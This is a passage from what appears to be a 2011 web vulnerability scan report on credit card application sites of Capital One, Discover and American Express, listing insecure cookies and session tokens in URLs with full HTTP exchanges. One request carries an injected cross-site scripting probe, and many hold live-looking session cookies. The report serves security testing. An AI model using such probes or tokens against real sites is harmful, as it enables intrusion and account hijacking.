Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; WWWJSESSIONID=0m7BN7BN6nNGhzBdpP67y3ncv2YRsjl9XPL7tTKvfbMXGSdhPzpS!639091316!1546850483; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

6.2. https://www.applyonlinenow.com/USCCapp/Ctl/display previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.applyonlinenow.com
Path:	/USCCapp/Ctl/display

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=0000M0rR0J2Y8xxLnoLQet1F3rI:-1; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /USCCapp/Ctl/display?pageid=popup&textid=faq1 HTTP/1.1
Host: www.applyonlinenow.com
Connection: keep-alive
Referer: https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJCQ&GV10=H|267|K49670&GV1=H%7C143%7Cgan_631529122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000ldjuhhHR5CpQg0jU5xYLxtN:-1; mbox=check#true#1308312903|session#1308312842615-157926#1308314703; cmRS=&t1=1308312848756&t2=1308312855857&t3=1308313519051&lti=1308313519051&ln=&hr=javascript%3AOpenWin%28display%3Fpageid%3Dpopup%26textid%3Dfaq1%2C395%2C279%2Cnewwin%29&fti=&fn=CRD%20APP%20-%20ao_Your%20Information%20-%20Viewed_application.formApply%3A0%3B&ac=&fd=&uer=&fu=&pi=Application%3A%20CRD%20APP%20-%20ao%20Step%3A%20100%20%28Your%20Information%20-%20Viewed%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394&ul=https%3A//www.applyonlinenow.com/USCCapp/Ctl/entry%3Fsc%3DUABJCQ%26GV10%3DH%7C267%7CK49670%26GV1%3DH%257C143%257Cgan_631529122&rf=http%3A//www.creditcards.com/oc/%3Fpid%3D22065113%26pg%3D11%26pgpos%3D5

Response

HTTP/1.1 302 Found
Date: Fri, 17 Jun 2011 12:25:20 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Location: https://www.applyonlinenow.com/USCCapp/static/error.html?error_code=1001
Content-Length: 0
Set-Cookie: JSESSIONID=0000M0rR0J2Y8xxLnoLQet1F3rI:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1
Content-Language: en-US

6.3. https://www.applyonlinenow.com/USCCapp/Ctl/entry previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.applyonlinenow.com
Path:	/USCCapp/Ctl/entry

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=0000AcsFbEU7BtYedf8xPa1--z8:-1; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /USCCapp/Ctl/entry?sc=UABJCQ&GV10=H|267|K49670&GV1=H%7C143%7Cgan_631529122 HTTP/1.1
Host: www.applyonlinenow.com
Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22065113&pg=11&pgpos=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=session#1308312842615-157926#1308315393|check#true#1308313593; JSESSIONID=0000KHM8oZE33MDRyWsCy2o6Q6w:-1; cmRS=&t1=1308313536718&t2=1308313540976&t3=1308313571532&t4=1308313531074&lti=1308313562826&ln=&hr=javascript%3AOpenWin%28display%3Fpageid%3Dpopup%26textid%3Dmaiden%2C395%2C279%2Cnewwin%29&fti=1308313569671&fn=CRD%20APP%20-%20ao_Your%20Information%20-%20Viewed_application.formApply%3A0%3B&ac=0:S&fd=0%3A75%3Aao.application.formApply.verifyButton_BUTTON%3B&uer=&fu=validate&pi=Application%3A%20CRD%20APP%20-%20ao%20Step%3A%20100%20%28Your%20Information%20-%20Viewed%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394&ul=https%3A//www.applyonlinenow.com/USCCapp/Ctl/entry%3Fsc%3DUABJCQ%26GV10%3DH%7C267%7CK49670%26GV1%3DH%257C143%257Cgan_631529122&rf=http%3A//www.creditcards.com/oc/%3Fpid%3D22065113%26pg%3D11%26pgpos%3D5

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:26:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000AcsFbEU7BtYedf8xPa1--z8:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 86023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Credit
...[SNIP]...

6.4. https://www.applyonlinenow.com/USCCapp/Ctl/validate previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.applyonlinenow.com
Path:	/USCCapp/Ctl/validate

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=0000txUoQLMgfpEEZGH4aujROUY:-1; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /USCCapp/Ctl/validate HTTP/1.1
Host: www.applyonlinenow.com
Connection: keep-alive
Referer: https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJCQ&GV10=H|267|K49670&GV1=H%7C143%7Cgan_631529122
Content-Length: 4675
Cache-Control: max-age=0
Origin: https://www.applyonlinenow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=session#1308312842615-157926#1308315393|check#true#1308313593; JSESSIONID=0000kcxk_ZzmjUGzrYQ-ZzvwVZK:-1; cmRS=&t1=1308313536718&t2=1308313540976&t3=1308313569672&t4=1308313531074&lti=1308313562826&ln=&hr=javascript%3AOpenWin%28display%3Fpageid%3Dpopup%26textid%3Dmaiden%2C395%2C279%2Cnewwin%29&fti=1308313569671&fn=CRD%20APP%20-%20ao_Your%20Information%20-%20Viewed_application.formApply%3A0%3B&ac=0:S&fd=0%3A75%3Aao.application.formApply.verifyButton_BUTTON%3B&uer=&fu=validate&pi=Application%3A%20CRD%20APP%20-%20ao%20Step%3A%20100%20%28Your%20Information%20-%20Viewed%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394&ul=https%3A//www.applyonlinenow.com/USCCapp/Ctl/entry%3Fsc%3DUABJCQ%26GV10%3DH%7C267%7CK49670%26GV1%3DH%257C143%257Cgan_631529122&rf=http%3A//www.creditcards.com/oc/%3Fpid%3D22065113%26pg%3D11%26pgpos%3D5

application.formApply.customerNameInputSection.txtFirstNameError.firstName=&application.formApply.customerNameInputSection.txtMiddleNameError.middleName=&application.formApply.customerNameInputSection
...[SNIP]...

Response

HTTP/1.1 302 Found
Date: Fri, 17 Jun 2011 12:26:10 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Location: https://www.applyonlinenow.com/USCCapp/static/error.html?error_code=1001
Content-Length: 0
Set-Cookie: JSESSIONID=0000txUoQLMgfpEEZGH4aujROUY:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1
Content-Language: en-US

6.5. https://www.discovercard.com/cardmembersvcs/registration/reg/goto previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/cardmembersvcs/registration/reg/goto

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

wfs=workflow.pwdreset=continue;Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cardmembersvcs/registration/reg/goto?forwardName=pwdresethome HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/registration/reg/goto?forwardName=forgotuserid
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; mbox=check#true#1308313859|session#1308313730257-773381#1308315659|disable#browser%20timeout#1308317346; __utmz=259108511.1308313866.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=259108511.91682261.1308313866.1308313866.1308313866.1; __utmc=259108511; __utmb=259108511.1.10.1308313866; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i:13ffb8sd7

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:32:24 GMT
Server: Apache
x-wily-info: Clear guid=9D9683510A07140B100E100E1D67CFB3
x-wily-servlet: Encrypt1 U+w0Pb5QTikwsT8iugvWOMCANIqeNSTiiFp2WOdcpH/2R7XG08DKCgKmNAlms0VtyDMtmWESJZA6dRswzKWhwSiymFq5SPemEUNcV3V+IZG5n//8emsbw1/fj6O/yY/mQtuDXg3OS4VCDbLIO0Zp4iO8VlAY/3lQskgHujKXSbsGtdUWPoMkkXFwZWL9zrMM
Set-Cookie: wfs=workflow.pwdreset=continue;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: private, no-cache=set-cookie
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 16708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

6.6. https://www262.americanexpress.com/business-card-application/simplycash-business-credit-card/apply/42732-9-0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/business-card-application/simplycash-business-credit-card/apply/42732-9-0

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:06:48 GMT; Path=/; Domain=.americanexpress.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business-card-application/simplycash-business-credit-card/apply/42732-9-0 HTTP/1.1
Host: www262.americanexpress.com
Connection: keep-alive
Referer: http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975; ngaopen_JSESSIONID=0000-Dg92efHFT7uhn3Nw5fe1Yr:1525kj48o; TrackingId=173.193.214.243-1308311996862975

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:48 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:06:48 GMT; Path=/; Domain=.americanexpress.com
Cache-Control: no-store, no-cache=set-cookie
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 101106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en">

...[SNIP]...

6.7. https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:03:57 GMT; Path=/; Domain=.americanexpress.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/?intlink=us-scandplum-plan1 HTTP/1.1
Host: www262.americanexpress.com
Connection: keep-alive
Referer: http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1a69c8%22-alert(document.location)-%2236ea2529e7b&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975; ngaopen_JSESSIONID=0000-Dg92efHFT7uhn3Nw5fe1Yr:1525kj48o

Response

7. Session token in URL previous next
There are 12 instances of this issue:

/icoreapp/images/custinfo/apply-by-phone-won.gif
/icoreapp/images/custinfo/btn_continue.gif
/icoreapp/images/custinfo/form_add_btm.gif
/icoreapp/images/custinfo/form_add_top.gif
/icoreapp/images/custinfo/form_btm_bg.gif
/icoreapp/images/custinfo/form_top_bg.gif
/icoreapp/images/custinfo/progress_step1_enter_info.gif
/icoreapp/images/custinfo/title-your-business-credit-card.gif
/icoreapp/images/custinfo/title_tell_about_biz.gif
/icoreapp/images/custinfo/title_tell_about_yourself.gif
/icoreapp/images/icons/icon_secure_small.gif
/icoreapp/images/icons/icon_tooltip.gif

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

7.1. https://application.capitalone.com/icoreapp/images/custinfo/apply-by-phone-won.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/apply-by-phone-won.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/apply-by-phone-won.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/apply-by-phone-won.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:55 GMT
Server: Apache
Last-Modified: Mon, 02 Mar 2009 18:26:14 GMT
ETag: "1c83f-2ce-46426f41e3d80"
Accept-Ranges: bytes
Content-Length: 718
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a}......\\\,,,LLL.......Hy...j........}}}.......=q>j....'X.4b.......Mv.mmm...............<<<.:o.........!.......,....}.......'...5\t$...p,.tm.x....8..0.@.x..r..y....4.....v.Ez.Q.b..r
..z..x....q0
...[SNIP]...

7.2. https://application.capitalone.com/icoreapp/images/custinfo/btn_continue.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/btn_continue.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/btn_continue.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/btn_continue.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:59 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:41:46 GMT
ETag: "1c845-65a-4481dbf34c280"
Accept-Ranges: bytes
Content-Length: 1626
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89aC......^.......9..V......`....nn....>..w..N..[..:.....V...^..[........k....gb....Z..A..Xo. b..u."h..w.#e..s. k....;p..m..b..]..d..\..g..x."g..r."v."c...........w."c..d..v."......m..\..d..`......
...[SNIP]...

7.3. https://application.capitalone.com/icoreapp/images/custinfo/form_add_btm.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/form_add_btm.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/form_add_btm.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/form_add_btm.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:41 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:41:52 GMT
ETag: "1c854-87-4481dbf905000"
Accept-Ranges: bytes
Content-Length: 135
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..
..........!.......,......
...^..................H...........L..........
.....L*.... .J......j............N..................;

7.4. https://application.capitalone.com/icoreapp/images/custinfo/form_add_top.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/form_add_top.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/form_add_top.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/form_add_top.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:59 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:41:52 GMT
ETag: "1c855-87-4481dbf905000"
Accept-Ranges: bytes
Content-Length: 135
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..
..........!.......,......
...^..................H...........L..........
.....L*.... .J......j............N..................;

7.5. https://application.capitalone.com/icoreapp/images/custinfo/form_btm_bg.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/form_btm_bg.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

